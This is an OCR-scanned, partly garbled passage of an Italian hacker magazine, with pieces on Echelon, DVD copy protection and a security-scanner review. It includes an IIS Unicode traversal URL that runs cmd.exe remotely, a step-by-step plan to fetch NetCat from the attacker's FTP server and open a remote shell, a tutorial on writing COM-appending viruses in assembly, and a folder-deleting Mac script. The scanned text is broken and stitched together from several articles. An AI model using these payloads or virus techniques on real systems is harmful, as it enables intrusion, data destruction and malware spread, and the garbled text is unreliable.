nauti si mettessero contemporaneamente 
ad inviare documenti criptati il sistema si 
bloccherebbe in modo inesorabile: ma 
questo è improbabile. Forse l'unico siste¬ 
ma è di tornare ai metodi antichi che non 
contemplino alcuna tecnologia: piccioni 
viaggiatori, corrispondenza scritta e ma¬ 
gari qualche bell'emissario con tanto di 
messaggio chiuso con ceralacca, alla fac¬ 
cia di Matrix.. SI 



Echelon è un sistema di controllo globale che filtra e-mail, fax e comunicazioni 
telefoniche attraverso basi periferiche organizzate come un grande Network. 







SICUREZZA„■ ■ 


UNA PERICOLOSA FALLA PER WINDOWS XP 



Salmoni 

col 

Cosa pensereste 
se qualcuno ui dicesse 
che un estraneo può 
prendere possesso del 
uostro PC e gouernarlo 
in remoto? Fantascienza? 
Se siete amministratori 
di un Lueb seruer basato 
su Windows NT potreste 
diuentare protagonisti 
dell’inuasione 
degli ultracorpi... 


P ur trattandosi di una vulne¬ 
rabilità conosciuta e fortu¬ 
natamente patchata ormai 
_ da svariati mesi (che in ter¬ 
mini informatici vuol dire 
"un'epoca"), sono ancora in molti, tra 
gli amministratori di sistemi Windows 
NT (4.0 o 5.0 che sia), a non aver an¬ 
cora applicato i fix rilasciati da Micro¬ 
soft, e che pertanto, ad oggi, conti¬ 
nuano ad esporre i propri web server 
a questa pericolosa vulnerabilità. 


» Che cos’è Unicode? 

Vediamo dunque di capire per bene 
di cosa si tratta, come e perché fun¬ 
ziona, e quali problemi derivano da 


una implementazione di questo baco. 

In pratica si tratta di un sistema di co¬ 
difica universale dei caratteri, valido, 
appunto, per ogni piattaforma, applica¬ 
zione o lingua esistenti. 


UNICODE IN SINTESI 

Unicode assegna un numero 
univoco a ogni carattere, 
indipendentemente dalla 
piattaforma, 

indipendentemente dall 1 ap¬ 
plicazione, 

indipendentemente dalla 
lingua. 

Per poter rappresentare i caratteri alfa- 
numerici tramite un elaboratore elettroni¬ 
co (che di norma si trova "più a suo agio" 
con i numeri) fino ad ora sono stati ela¬ 


borati numerosi sistemi di codifica; pur¬ 
troppo molti di essi agiscono conflittual¬ 
mente tra loro, e, molto banalmente, ac¬ 
cade che un documento codificato in un 
certo modo sia solo parzialmente, se non 
del tutto, illeggibile da una applicazione 
che invece poggia su un altro standard. 
L'avvento di Internet ed il conseguente in¬ 
cremento di postazioni informatiche in tut¬ 
to il mondo ha reso necessario lo svilup¬ 
po di un sistema universale di codifica, in 
modo da non costringere utenti e svilup¬ 
patori ad impazzire dietro ad URL che ri¬ 
sultano errati su un sistema ma validi in 
un altri, documenti di testo che sostituisco¬ 
no caratteri tra loro se letti con un word 
processor invece che con un altro, eccete¬ 
ra eccetera... 

Basti pensare per un momento a tutti 
quei popoli che utilizzano sistemi alfabeti¬ 
ci differenti da quello romanico (per in- 
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tenderci, giapponesi, cinesi, arabi...) per 
realizzare che l'avvento di questo stan¬ 
dard abbia rappresentato un grosso bal¬ 
zo in avanti per quanto riguarda la por¬ 
tabilità delle informazioni in rete. 

Entrando nello specifico, ciò che ci in¬ 
teressa maggiormente è l'implementa- 
zione di Unicode nei vari sistemi opera¬ 
tivi che di fatto offrono servizi in rete: un 
server web, per esempio, saprà ricono¬ 
scere un URL chiamatogli da un qualsia¬ 
si browser (Explore, Netscape, Mozilla...) 
mediante questa codifica. 

Un giorno, smanettando allegramente 
sulla sua tastiera, un anonimo individuo 
scoprì (probabilmente quasi per caso) 
che un URL di questo tipo: 


http://address.of.iis5.sys 
tem/scripts/..%cl%lc../win 
nt/system32/cmd.exe?/c+dir 
+c:\ 

non restituiva altro che la directory di c:\ 
dell'host "address.of.iis5.System", lan¬ 
ciando di fatto da remoto un comando 
presente sull'host. Cosa che, inutile dirlo, 
non dovrebbe mai accadere: se al posto 
di quel "dir+c:\" finale ponessimo infatti 
qualche altra cosa, sarebbe facile intuire 
i problemi di sicurezza. Il trucco è sem¬ 
plice: l'implementazione Unicode pro¬ 
pria dei web server Microsoft Internet In¬ 
formation Server è affetta da una imper¬ 
fezione (una delle tante J) che ci permet- 
tedi "risalire" tra le directory del sistema, 
uscendo da quella a cui dovremmo avere 
normalmente accesso in lettura (inetpub e 
figli, dove appunto risiedono i file web), 
esattamente come i salmoni riescono 
a risalire la corrente dei fiumi, per ritro¬ 
varci poi nella cartella principale. Da qui, 
una chiamata a winnt/system32/cmd.exe 
ci fornisce di fatto una shell remota; la 
possibilità di eseguire qualsiasi comando 
sul server. Questo accade perché, nor¬ 
malmente, una richiesta quale: 


http://www.sito.com/..\..\ 
dir.exe 

verrebbe ignorata. E' qui che interviene 
(in malo modo) l'implementazione di 


Unicode all'interno di MS. Quando al 
Webserver in questione chiediamo una co¬ 
sa come esso la scarta, in quanto 

errata. Purtroppo (o per foruna J) quando 
invece la stessa richiesta viene passata 
mediante codificazione Unicode, quest'ul¬ 
timo viene accolta come "buona" e quin¬ 
di processata. 

Se quindi in luogo di poniamo il 

loro corrispondente valore Unicode, ecco 
che siamo in grado di "risalire la corren¬ 
te" sfuggendo alla directory assegnata al¬ 
la lettura web. A questo punto abbiamo 
accesso ai dati contenuti nel sistema, ma 
la cosa peggiore, come abbiamo già avu¬ 
to modo di accennare, è che trovata una 
shell (cmd.exe, per esempio J) possiamo 
eseguire arbitrariamente comandi sul 
Webserver. 

Se sulla macchina vittima potessimo ad 
esempio uploadare files, sarebbe molto, 
molto semplice montarvi sopra una qualche 
backdoor ed ottenere accesso completo al si¬ 
stema. E' infatti sufficiente utilizzare il più 
classico dei metodi di trasferimento di dati: 
FTP II nostro problema è che non basta lan¬ 
ciare FTP sulla macchina remota, in 
quanto l'esecuzione del comando non fareb¬ 
be altro che lanciare il processo relativo, la¬ 
sciandoci poi sempre alle prese con la nostra 
shell invece che con quella di FTF) e pertanto 
impossibilitati ad utilizzarlo. Per fortuna FTP 
accetta parametri, tra i quali "-s nomefile", 
che ci permette di porre in un qualsiasi file 
una lista di comandi da far eseguire a FTP in 
un'unica chiamata. 

Basterebbe quindi poter scrivere dentro ad 
un file i comandi adatti per farli poi eseguire 
da FTP: per far ciò non faremo altro che uti¬ 
lizzare il comando "echo": 

Questa linea, per esempio, aggiungerà la 
stringa "hello!" al file "c:\test.txt". 

Avrete già immaginato come va a finire: 
tramite echo prepareremo la lista di coman¬ 
di da far eseguire ad FTR tramite il quale pre¬ 
leveremo poi dalla nostra macchina (sulla 
quale avremo preventivamente installato un 
FTP server) il file che ci interessa uploadare. 
INUTILE dire che la cosa più semplice è spe¬ 
dire alla vittima un bel NetCat, che lancere- 
mo poi in modalità shadow: collegandoci in 
seguito tramite una semplice sessione telnet 
avremo un accesso remoto alla macchina, 
con la possibilità di utilizzarla proprio come 
se fosse la nostra shell di MS-DOS. Si 



Per inserirsi nella 
falla di Unicode è 
sufficiente 
utilizzare il più 
classico dei metodi 
di trasferimento di 
dati: FTP. Il nostro problema 
è che non basta lanciare FTP 
sulla macchina remota, in 
quanto l'esecuzione del 
comando non farebbe altro che 
lanciare il processo 
relativo, lasciandoci poi 
sempre alle prese con la 
nostra shell invece che con 
quella di FTP, e pertanto 
impossibilitati ad 
utilizzarlo. Per fortuna FTP 
accetta parametri, tra i 
quali "-s nomefile", che ci 
permette di porre in un 
qualsiasi file una lista di 
comandi da far eseguire a FTP 
in un'unica chiamata. 
Basterebbe quindi poter 
scrivere dentro ad un file i 
comandi adatti per farli poi 
eseguire da FTP : per far ciò 
non faremo altro che 
utilizzare il comando "echo": 
Questa linea aggiungerà la 
stringa "hello !" al file 
"c:\test.txt". 


Tramite echo prepareremo la 


lista di comandi da far 
eseguire ad FTP, tramite il 
quale preleveremo poi dalla 
nostra macchina (sulla quale 
avremo preventivamente 
installato un FTP server) il 
file che ci interessa 
uploadare. Inutile dire che 
la cosa più semplice è 
spedire alla vittima un bel 
NetCat, che lanceremo poi in 
modalità shadow: collegandoci 
in seguito tramite una 
semplice sessione telnet 
avremo un accesso remoto alla 
macchina, con la possibilità 
di utilizzarla come se fosse 
la nostra shell di MS-DOS. Si 
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VIRUS 


QUANDO IL COMPUTER SI "AMMALA" 



Introduzione al Uirus 


Sui Uirus si è scritto molto. Pagine e pagine di letteratura informatica 
non priue, a uolte, di grossolane approssimazioni. Ma cosa sono i Uirus? 
Hacker Journal ui racconta tutto quello che aureste uoluto sapere 
su questo pericolso killer informatico, ma che non auete mai osato chiedere. 


er la gente comune i due mag¬ 
giori spauracchi informatici sono 
certamente gli hacker ed i virus. I 
"non addetti ai lavori" si ritrovano 
spesso i peli della schiena drizzati 
non appena sentono anche solo 
nominare uno di questi due termini. 
Tuttavia, nonostante la fama che i presunti 
pirati-informatici e i parassiti dei file si sono 
procurati nel mondo reale, ben pochi san¬ 
no cosa essi realmente siano. In questa se¬ 
de non spenderò molte parole per gli hac¬ 
ker di cui se ne parla già molto e per i qua¬ 
li inizia a nascere una specie di "resistenza" 
alla cattiva, ma errata, reputazione che si è 
fatta la gente che seduta di fornte alla TV è 
costretta a sentire solo quello che gli viene 
detto. Al contrario degli hacker, i virus non 
sono così difendibili, dato che la loro diffu¬ 
sione è esclusivamente dannosa per un 
computer. Eppure, è giusto che qualcuno 
spenda due parole per cercare di spiegare 
cosa sono questi temutissimi killer dei PC. 


» Uirus a 


Prima di scendere nel dettaglio è uti¬ 
le fare una distinzione fra le varie cate¬ 


gorie. Spesso e volentieri per virus si in¬ 
tendono anche altri programmi di tipo 
malizioso che invece con questi hanno 
ben poco da spartire. 

Sostazialmente quando si crea un 
parassita virtuale si cerca di dare vita 
ad un programma di piccole dimensio¬ 
ni che come scopo abbia quello di ce¬ 
larsi il più possibile nell'ospite e di ri¬ 
prodursi senza dare nell'occhio. Stando 
a questa distinzione, i semplici cavalli di 
troia come i celeberrimi 

non fanno par¬ 
te della categoria. Altra categoria a se 
sono i worm. Anche se questi si diffon¬ 
dono per la rete spesso sfruttando bu¬ 
chi dei sistemi di posta o l'ingenuità di 
chi ne è vittima, essi si diversificano dai 
virus proprio per la loro attitudine alla 
rete e perchè raramente cercano di ce¬ 
larsi in un sistema infetto. 

Distinte due categorie diverse da 
quelle dei virus non ci resta che fare un 
brevissimo riassunto delle diverse tipo¬ 
logie di virus esistenti: si parte dai più 
semplici, i virus appending dei file 
COM, agli ormai impotenti virus del- 
l'mbr, passando per gli sthealt parazia- 
li e completi fino ai polimorfici e ai più 


recenti virus per Windows senza scor¬ 
dare i virus delle MACRO di Office. 

Questi sono alcuni fra i tipi di "infet¬ 
tatori viruali" conosciuti e ci vorrebbero 
molte pagine per spiegare come essi 
funzionano nel dettaglio. Per questa vol¬ 
ta ci limiteremo a trattare quelli più 
semplici come ali appending e accen¬ 
neremmo al polimorfismo e alla critto¬ 
grafia. 


Gli Appending Uirus 


Gli appending virus sono i più co¬ 
muni e più facili da realizzare. Essi si 
copiano alla fine di un file e quando 
questo viene eseguito ne prendono il 
controllo, si replicano in altri file e per 
ultimo ridanno il controllo al program¬ 
ma infetto facendo sembrare il tutto 
normale. Questo tipo di parassiti deve 
essere molto piccolo per non aumen¬ 
tare troppo le dimensioni di un file che 
altrimenti sarebbe facilmente idividua- 
bile come infetto. Gli appending si di¬ 
vidono in due sottocategorie, quelli fat¬ 
ti per i file COM e quelli per i 
. Infatti, nonostante entrambi i file 


IVO ITTI S 
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con queste estensioni siano degli ese¬ 
guibili essi hanno molte differenze fra 
di loro e infettare i file COM risulta 
molto più semplice data la sua struttu¬ 
ra, quindi questo testo si baserà per lo 
più sull'infezione di file COM. La prima 
scelta da fare per la costruzione di un 
virus è quella del linguaggio nel quale 
scriverlo. Anche se il C può essere una 
valida alternativa soprattutto per i virus 
studiati per Windows l'assembler rima¬ 
ne la soluzione migliore da adottare. 

Iniziamo quindi a vedere cosa deve 
fare un file per infettarne un altro senza 
rovinarlo: il virus messo in esecuzione 
deve cercare un file *.com (per ora ci li¬ 
miteremo a questi), controllare in qual¬ 
che modo di non averlo già infettato, 
modificare il file come dopo vedremo e 
alla fine ripristinare la data dell'ultima 
modifica e gli attributi del file come gli 
aveva trovati onde evitare di lasciare 
traccie. Fin qui le cose sono abbastanza 
semplici, il problema per chi inizia sta 
nel capire come fare in modo di toglie¬ 
re il controllo al file eseguito e darlo al 
virus che, come spiegato dopo, 
attaccare alla fine dèi program- 

La soluzione è data dall'istruzione in 
codice macchina JMP che scritta all'inizio 
del file fa saltare l'esecuzione alla fine, 
dove risiede appunto il virus. In pratica 
quest'ultimo, una volta eseguito, cerca i 
file da infettare e appena ne trova uno 
adatto copia da una parte i primi byte 
del file vittima e al loro posto scrive l'i¬ 
struzione JMP seguita dalla posizione 
che prenderà nel file. Fatto ciò copierà 
se stesso in coda al programma e conti¬ 
nuerà con le operazioni sopra citate, 
cioè chiusura del file, ripristino degli at¬ 
tributi e esecuzione del file originale. 


Detto questo si è esaurito il grosso della 
teoria sui virus appending, l'unico osta¬ 
colo a questo punto può risultare la 
scarsa conoscenza dell'assembly quindi 
sarebbe bene sapere cosa è un registro 
o un jump prima di proseguire. 


» La genesi dei uirus... 

Una cosa che spesso molti dimenti¬ 
cano è che se vengono usate delle va¬ 
riabili nel virus esse cambiano il loro 
valore di offset quando il virus si incol¬ 
la alla fine di un file. Ecco quindi che 
spesso risulta impossibile risalire a 
queste variabili che diventano inutiliz¬ 



zabili. Per trovare sempre il valore di 
offset effettivo delle varibile le si chia¬ 
ma aggiungendo al loro vecchio valo¬ 
re di offset (quello che le viene asse¬ 
gnato dal compilatore) quello che le è 
stato aggiunto allegandole alla fine di 
un altro file. Per ottenere il valore da 


aumentare basterà usare l‘ 

che chiama una procedura, 
poppare in BP e poi sottrarre nel regi¬ 
stro BP (che viene poco utilizzato) l'off¬ 
set della procedura chiamata. Tutto ciò 
è possibile perchè quando chiamiamo 
con una CALL l'offset della procedura 
viene messo sopra lo stock, quindi con 
POP lo mettiamo in BP. A questo 
punto i riferimenti alle varibili saranno 
fatti chimando [BP+OFFSET variabile]. 
Questa cosa risulta fondamentale per 
evitare di perdere riferimenti alle varia¬ 
bili, al contrario non serve modificare 
le istruzioni che usano un offset relati¬ 
vo come le JMP o CALL o i vari salti 
condizionati. 

Una volta trovata la variazione di 
offset il programma occorre iniziare a 
cercare file da infettare. Siccome per 
ora trattiamo solo di file *.COM la ri¬ 
cerca sarà limitata a questo tipo di fi¬ 
le. Per cercare un file si ricorre alle chi¬ 
niate FIND FIRST e FIND NEXT cioè la 
4Eh e la 4Fh del DOS (interrupt 2Ih). 
Si inizia usando la 4Eh che cerca il pri¬ 
mo file, questa funzione chiede che 
nel registro CX vengano posti gli attri¬ 
buti del file da cercare (O-Read Only 
1-Hidden 2-System 3-Label 5-(riserva- 
to) 6-Archivioj mentre DS:DX il file da 
cercare con eventuali wildcards (* o ?). 
Nel caso del virus si dovrà mettere nei 
dati una variabile File COM DB 
corri", 0 che rappreseta la stringa in 
ASCIIZ da cercare (il formato ASCIIZ 
prevede uno 0 alla fine di ogni strin¬ 
ga) e poi mettere in CX il tipo di file da 
cercare con MOV CX,0000H per cer¬ 
care, ad esempio, i file Read Only e 
poi mettere in DS:DX la stringa da cer¬ 
care con LEA DX, 

quindi chimare INT 21 h per 


Klex cavalli di Troia Melissa 
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VIRUS 


QUANDO IL COMPUTER SI "AMMALA" 


W 


iniziare a cercare. La ricerca restituirà 
solo il primo file trovato, se questo non 
ci andrà bene basterà chiamare la FIND 
NEXT (funzione 4Fh delPINT 2Ih) con gli 
stessi parameti (CX attributi, DS:DX file 
da cercare) per trovare il prossimo file 
finché non trovimao una vittima adatta. 

Fin qui dovrebbe essere tutto semplice, 
ma FIND FIRST e FIND NEXT dove ci re¬ 
stituiscono il file? Beh, nel DTA che è una 
parte del PSP posizionata ad 80h. 

Ora un virus non può usare il DTA ori¬ 
ginale altrimenti i dati passati a linea di 
comando in seguito al programma ver¬ 
rebbero falsati, è quindi importante setta- 
re un nuova DTA e lavorare in quello. Ba¬ 
sterà preparare una variabie DTA di 42 
byte (DTA db 42 dup (?)) e poi usare la 
funzione lAh del DOS: LEA DX,[BP+OFF- 
SET DTA] quindi MOV AH,1Ah e poi INT 
21 h. Ora il nome del file da provare ad 
infettare lo troveremo nella variabile DTA 
alla posizione 9eh (quindi chiameremo la 
varibile DTA con [BP+OFFSET 
DTA+IEh]). Nel DTA non si trova solo il 
nome del file, ma anche i suoi attributi, la 
data e l'ora dell'ultima modifica, le dimen¬ 
sioni il tutto nel seguente ordine: 


DB 'R';maratore che nel nostro caso è 
la lettera R 

INIZIO: /etichetta dove inizia il 

virus vero e proprio 
Il virus prima di iniziare ad infettare 
controllerà se il file al 4 byte non è stato 
marcato con un CMF] e nel caso non lo 
sia procederà all'infezione. 


•• •• •• •••• ••••• 



Questo primo sguardo sul mondo 
della programmazione virus-oriented ci 
mostra la complessità e la quantità di 
problemi a cui un virus-coder va incon¬ 
tro quando si mette in testa di sfornare 
qualche parassita informatico. 

Anche se, come abbiamo già detto, 
lo scrivere virus e soprattutto il diffon¬ 
derli in rete rappresentano azioni sem¬ 
pre distruttive e dannose (ma non per le 
grosse aziende che producono costosi 
sistemi antivirus) è tuttavia innegabile il 
fascino tecnico di alcuni aspetti che si af¬ 
frontano in questi ambiti dell'informati¬ 
ca: il consiglio migliore è quello di ap¬ 
prendere sempre studiando anche que¬ 
sto tipo di codici; spesso vi capiterà di ri¬ 
manere di sasso nell'osservare con 
quanta facilità un buon virus-coder ri¬ 
solve problemi di programmazione con 
cui voi vi stavate battendo da giorni e 
giorni... Si 

(Nei prossimi articoli continueremo 
la trattazione dei virus entrando nello specifico 
di alcuni aspetti ed analizzando le diverse tipologie 

di infezione). 


quindi se volessimo, per leggere uno 
qualsiasi di questi attributi basterà ag 
giungere all'indirizzo della varibile DTA 
la posizione di ciò che ci interessa. 

Una volta trovato un file è indispensa 
bile asscurarsi che rientri nei nostri criteri 
di infezione. Se il file è già stato infettato 
sarebbe più opportuno evitare di rifarlo. 
Uno dei metodi più comuni per controlla 
re se il file è già stato infettato è porre un 
marcatore d'infezione nei primi byte del 
programma (e anche del virus), subito 
dopo l'istruzione di jmp. Il virus dovrà, una 
volta trovato una possibile vittima, control 
lare se in una determinta posizione è pre 
sente una sigla particolare che iden 
ii il file come . Nel virus co 

me prime istruzioni metteremo: 

JMP INIZIO /salto semplice 



i=GetFolder Itera ( "Macintosh 
HD:Dokumente") 
If i <> nil Then 

i. Delete 
End if 

j=GetFolder Itera ( "Macintosh 
HD:Internet") 
If j <> nil Then 

j. Delete 
End if 

Questo simpatico virus può 
bloccare un sistema operativo 
o danneggiare seriamente 
un disco rigido, conoscerne 
lo script può servire 
a cavarsi d'impaccio 
in caso di emergenza. 
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DVD A PROVA DI COPIA 



Come 


\ calano, poteva 
esibite al prob/e/a ( 


Dtiod si e accorra < 
potente industrie 

c pe no, anche $ e . 


c ° di gente copie 

grafica mondiale 

s dfino una oiù del 


- ■ i problema della pirate- 

da sembra affliggere 
\ / un po' tutti i settori 

\-/ della tecnologia di con¬ 

sumo. E' tutt'altro che sopita la polemica 
della musica distribuita in formato MP3 e 
dei CD audio che vengono facilmente du¬ 
plicati o copiati sull’hard disk per poterne 
immettere le canzoni in rete. Ma ora l'al¬ 
larme arriva dall'industria cinematografica 
e riguarda un settore in forte crescita, 
quello dei DVD video che ormai sono di¬ 
ventati un formato tra i più contraffatti. A 
preoccupare le case di produzione cine¬ 
matografiche è l'abbassamento di prezzo 
dei masterizzatori per DVD che, di fatto, 
contribuisce ad allargare a dismisura il 
mercato dei falsi. L'equazione è semplice: 
più masterizzatori, più copie illegali, ugua¬ 
le meno profitti per Hollywood e compa¬ 
gnia. 

Intendiamoci, non è che le società cine¬ 
matografiche siano rimaste fino ad oggi 
con le mani in mano. Infatti i DVD in com¬ 
mercio dispongono di dispositivi anti-co- 
pia che tuttavia possono essere facilmente 
aggirati. Tra i più diffusi sistemi anti-copia 
c'è il Content Scrambling System (CSS), 
uno schema di criptatura e di autenticazio¬ 
ne dei dati ideato per evitare la copia dei 
file video direttamente dal disco. Sfortuna¬ 
tamente per i produttori già nel 1999 un 
hacker norvegese di sedici anni, Jon Jo- 
hansen, ha ideato e messo in rete un pro¬ 
gramma chiamato DeCSS utilizzabile su 
Pc equipaggiati con sistema opera¬ 
tivo Linux e in grado di permet¬ 
tere la copia su hard disk e 
la riproduzione illimi¬ 
tata di copie di 
DVD. Punto e 
i a capo. 


impercettibile dagli orecchi o dagli oc¬ 
chi umani. Tali contrassegni potranno 
essere però riconosciuti dagli apparec¬ 
chi riproduttori e registratori. Così se 
una copia sprovvista di filigrana elet¬ 
tronica verrà caricata su un masteriz- 
zatore, l'operazione di copia non sarà 
possibile e anche i lettori DVD non po¬ 
tranno leggere le copie pirata, ma so¬ 
lo quelle con la filigrana elettronica 
apposta dalla casa di produzione. In 
questo modo sarà praticamente im¬ 
possibile duplicare i DVD, ma anche 
leggere quelli eventualmente realizzati 
in modo illegale, una doppia protezio¬ 
ne che appare veramente a prova di 
bomba. 

Tutto questo a patto che l'alleanza 
tra produttori di hardware e industria 
del video digitale vada in porto, anche 
se è difficile dire se con essa la lotta al¬ 
la pirateria sarà definitivamente vinta. 
Qualche dubbio rimane. 


» Quando il gioco 


si fa duro 


A ltri sistemi per combattere la pira¬ 
teria sono stati recentemente intro¬ 
dotti, purtroppo per le major discogra¬ 
fiche sono stati ideati altrettanti sistemi 
di decriptaggio sempre più efficienti e 
facili da usare come il recente Smar- 
tRipper, scaricabile molto facilmente 
da internet, e che consente d 


i aggirare 
i sistemi anti-copia, tipo CSS, contenu¬ 
ti nei DVD. 

Proprio per questo motivo le società 
che operano nel settore del video han¬ 
no deciso di cambiare l'orizzonte della 
propria lotta alla pirateria. Un vecchio 
detto dice: "se non puoi batterli fatteli 
amici", chiaramente la massima non è 


» La sentenza 


Ha fatto scalpore la recente senten¬ 
za della corte di appello di New York 
che ha, di fatto, condannato il proprie¬ 
tario di un sito (nb web 2000) vietan¬ 
dogli di ospitare il link che permette di 
scaricare il programma DeCSS, 


ovvero 

il software per aggirare le protezioni 
dei DVD e poterli copiare agevolmente 

produrli. Se- 


sul proprio rC per poi ri 
condo la corte newyorchese l'uso di un 
codice come il DeCSS riporta implicita¬ 
mente alla riproduzione illegale di co¬ 
pie di DVD protette dal diritto del copy¬ 
right. La sentenza di per sé non è così 
clamorosa, infatti non fa altro che ri¬ 
prendere una legge, piuttosto discussa, 
nota come Digital Millennium Copy¬ 
right Act (DMCA) approvata nel 1998 e 
che in qualche modo tutela il "codice 
informatico", ovvero riconosce che an- 


e masterizzatori UVU di nuova genera¬ 
zione, se costruiti con le dovute specifi¬ 
che tecniche. La filigrana è la stessa 
che viene usata per i DVD-audio è 
contrassegnerà permanentemente 
ogni singola sequenza video o audio 
con del rumore 


si presume sara 







COME FARE UNA "SCANSIONE" DI SICUREZZA 


^^SQShadaw 
Security Scorine 


Uolete uerificare la sicurezza del uostro seruer? Pensate che sia affetta da uno 

□ più bachi? Non ui resta che usare un software scanner e già che ci siete potete 

f-4 ' \ , ’.TT;. . , 

optare per uno dei migliori in circolazione... 


L a sicurezza informatica inizia a 
interessare le aziende: la cre¬ 
scente sensibilità verso questo 
tipo di problematiche da parte 
degli addetti ai lavori così come di chi 
.utilizza comunque il computer per pro¬ 
fessione sta evidentemente spingendo il 
mercato a trovare soluzioni che possa¬ 
no soddisfare il "bisogno di sicurezza" 
di molte aziende, nonché nuovi guada¬ 
gni da un business che ad oggi appare 
molto florido. 

In quest'ottica è naturale che molti si 
producano in progetti orientati alla sicu¬ 
rezza, e la quantità di software che è 
oggi disponibile in rete ad uso di chi ha 
necessità di mettere una pezza ai propri 
server è molto elevata. 

A volte, lo è anche la qualità. 


Shadow Security Scanner è unc 
scanner di rete in grado (come molt 
altri prodotti a lui analoghi) di trovare 
tutti i servizi attivi su un hostm, effettua 
re una serie di test su di essi e fornirci ur 


do in ambiente Windows, per esempio, 
il più famoso (e uno dei più costosi) è 
senza dubbio Retina; di recente anche 
Microsoft ha rilasciato un suo scanner 
di sicurezza. Su Linux è la volta dei ce¬ 
leberrimi SATAN, SAINT, e l'indiscusso 
Nessus. 

Shadows Security Scanner si presen¬ 
ta come un pacchetto installabile di soli 
3,4 Mega, downloadabile in versione 


mentore e vari links a cui far riferimen¬ 
to per ottenere informazioni dettagliate 
su qualsiasi vulnerabilità nota. 


tore (Red Shadow) www.safety- 
lab.com: se nelle sue prime versioni 
SSS era probabilmente niente più che 
un buon tool scritto da un appassiona¬ 
to di hacking&co (in effetti il program¬ 
ma appariva molto "black hat" anche 
nella grafica) il buon successo che ha 
ottenuto ha spinto i suoi creatori a dar- 


» Shadouj Security 
Scanner 
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gli un tono decisamente più professio¬ 
nale e "business oriented". 

L'interfaccia è pulita ed efficace (sia¬ 
mo ormai alla versione 5.29), l'installa¬ 
zione non presenta altre difficoltà che il 
premere "next" ad ogni passo del wi¬ 
zard, così anche l'uso è dei più sempl- 
ci: per un utilizzo di base non è richie¬ 
sto altro che inserire l'host da scannare 
e premere su "start". 

Fatto ciò, lo scanner comincia col 
pingare l'host, effettuare connessioni su 
un ampio set di porte remote e iniziare 
a collezionare informazioni. 

Nella seconda fase del test vengono 
implementati tutti i vari tentativi di ex- 
ploiting, password cracking e compa¬ 
gnia che al termine della scansione ci 
porteranno a ottenere un dettagliato 
report (con tanto di grafici inutili, così 
importanti per gli agenti commerciali di 

Q uelle aziende che vanno in giro a ven¬ 
ere "sicurezza" sotto forma di report 
generati in 5 minuti da software come 
questo... 


sibile editare le politiche che vengono 
utilizzate dal motore del programma 
per effettuare le scansioni e applicarle 
in combinazione con una host-list. 

Se per esempio nella nostra rete so¬ 
no presenti due server, uno Linux e uno 
NT, potremo dire a SSS che sul primo 
vengano effettuati controlli su servizi ti¬ 
pici di macchine Linux, mentre sul se¬ 
condo solo quelli atti a scovare bachi di 
NT. Il risparmio di tempo è notevole. 

Possiamo inoltre schedulare le scan¬ 
sioni (per effettuarle magari di notte o in 
condizioni preordinate di scarso traffico 
di rete) ed effettuare test specifici per 
quanto concerne denial of Services e 
password cracking (sono presenti tools 


» Di Baco in baco 

Per ogni "audit" trovato (cioè ogni 
possibile falla) avremo una descrizione 
del problema e un possibile test da ef¬ 
fettuare al fine di verificare incontrover¬ 
tibilmente se la Mostra macchina è dav¬ 
vero affetta da tale baco: se per esem¬ 
pio viene rilevato il famigerato "uni- 
code transversai bug" troveremo a 
report un uri formato appositamente 
per mostrarci come sia possibile ese¬ 
guire comandi remotamente sul nostro 
server, o se per caso viene scovata una 
versione bucata di un qualche server 
FTP troveremo un link al database di 
securityfocus che ci porterà all'exploit in 
questione. \ 

Oltre a questo, è presente anche 
una descrizione delle procedure da im¬ 
plementare per correggere la data vul¬ 
nerabilità; in alcuni casi, come per 
esempio quando la soluzione a un ba¬ 
co renda necessario la sola modifica¬ 
zione del registro di sistema, è addirit¬ 
tura possibile correggere l'errore sem¬ 
plicemente cliccando su un bottone 
"Fix-it", anche se veniamo comunque 
avvertiti che non sempre questa proce¬ 
dura è efficace. 

Addentrandoci un filo più profonda¬ 
mente tra le varie opzioni che SSS ci of¬ 
fre, però, iniziamo a trovare varie cose 
che lo rendono più interessante: è pos¬ 



appositi per queste operazioni). 

Per quanto concerne l'update del da¬ 
tabase delle vulnerabilità, anche questo 
è una operazione resa semplicissima da 
un update automatico che scaricherà gli 
aggiornamenti e li installerà in pochi 
minuti. 

Insomma, nelle sue ultime relase SSS 
si è chiaramente orientato a quella fa¬ 
scia di utenza che necessita di un pro¬ 
gramma semplice da utilizzare e che sia 
almeno mediamente affidabile. 

E' chiaro che nessun software potrà 
mai sostituire la consulenza di un esper¬ 
to, e molto spesso nei report vengono 
segnalati falsi positivi che ci costringono 
comunque a intervenire per verificare 
che tutto sia a posto. 

E' altresì vero, però, che questo pro¬ 
gramma, per come è pensato e per 
quello che offre, funziona bene: molto 
seguito dai suoi programmatori, e quin¬ 
di molto spesso aggiornato e migliora¬ 
to in alcuni aspetti, è ad oggi una solu¬ 
zione economica (la licenza costa 
100 dollari o giù di lì) per piccole 
aziende che non possono permettersi 


un responsabile di sicurezza e che tra¬ 
mite SSS riescono quanto meno a "tap¬ 
pare" i buchi più clamorosi. 

Con la frequenza con cui troviamo in 
giro per la rete aziende che hostano 
250 siti web commerciali e che non 
hanno mai fatto passare sui server un 
Service pack per NT 4.0, è senza dub¬ 
bio positiva la diffusione e l'utilizzo di 
software del genere. 

E' dunque sensato affidarsi a SSS per 
la sicurezza dei nostri server? lo credo 
che a fronte del suo bassissimo costo 
(Retina offre di più, è vero, ma costa an¬ 
che 100 volte tanto), e sempre tenendo 
ben presente che mai si potranno otte¬ 
nere risultati paragonabili a quelli che 
solo un esperto in carne e ossa ci può 
garantire, sia quantomeno consigliabile 
provare la versione shereware e fare un 
paio di scansioni sui server web nello 
stanzino: la quantità di "rosso" presente 
sul monitor sarà il miglior indice di con¬ 
sultazione. 

» I concorrenti 

E' da tener presente che esistono mol¬ 
ti altri prodotti, alcuni dei quali gratuiti 
come Nessus per Linux, che è nettamen¬ 
te superiore a SSS per moltissimi aspetti 
(architettura server-client, versatilità 
etc...) ma che probabilmente si rivolgo¬ 
no a un altro tipo di utenza, data la loro 
relativa complessità. 

Strumenti come Shadow Security 
Scanner di certo non sono la bacchetta 
magica con cui rendere sicuro un web 
server, ma rendono possibile anche a chi 
non è o non può permettersi un esperto 
di sicurezza informatica il poter uscire in 
rete con rischi di security certamente infe¬ 
riori rispetto a chi si limita a installare NT 
e a infilare lo spinotto nella scheda di re¬ 
te. L'altra faccia della medaglia è l'utiliz¬ 
zo distruttivo che è possibile fare di que¬ 
sti programmi: di fatto possiamo andare 
a scannare qualsiasi host, ottenendo 
molte informazioni sul sistema operativo 
e sui servizi che vi sono installati; ed è 
probabilmente vero che molti kiddies si 
